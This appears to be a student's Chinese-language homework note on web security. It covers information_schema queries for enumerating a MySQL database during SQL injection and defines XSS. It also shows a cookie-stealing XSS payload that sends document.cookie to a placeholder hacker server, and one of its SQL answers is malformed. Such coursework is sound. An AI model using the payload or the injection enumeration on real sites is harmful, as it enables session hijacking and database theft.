# 2019/11/12 # Information_schema 是什麼 資料庫名稱 # 如果想知道 這台 mysql server 有啥資料庫，如何下sql指令 select table_schema from mysql server # 如果想知道ctf資料庫底下有什麼表格，如何下sql指令 select table_name from information_schema.tables where table_schema = ‘ctf’; # 如果想知道stu table 底下有什麼欄位，如何下sql指令 select column_name from information_schema.columns where table_name = ‘stu’; # 解釋 SQL III 是如何 dump 出整個資料庫 逐次將資料庫內的所有table和column列出，最後就會拿到整個資料庫 # XSS 攻擊是什麼! XSS攻擊通常指的是通過利用網頁開發時留下的漏洞，通過巧妙的方法注入惡意指令代碼到網頁，使用戶載入並執行攻擊者惡意製造的網頁程式。這些惡意網頁程式通常是JavaScript，但實際上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻擊成功後，攻擊者可能得到更高的權限（如執行一些操作）、私密網頁內容、對談和cookie等各種內容。 截圖完成https://xss-game.appspot.com/前三關   # 解釋為何<script>document.location.href="https://{駭客伺服器}/"+document.cookie</script> 可以拿到使用者權限 如果XSS攻擊成功，會跳轉到駭客伺服器，會拿到受害者的cookie，拿到登入資料。 # 截圖 CTF 完成 SQL I, II, XSS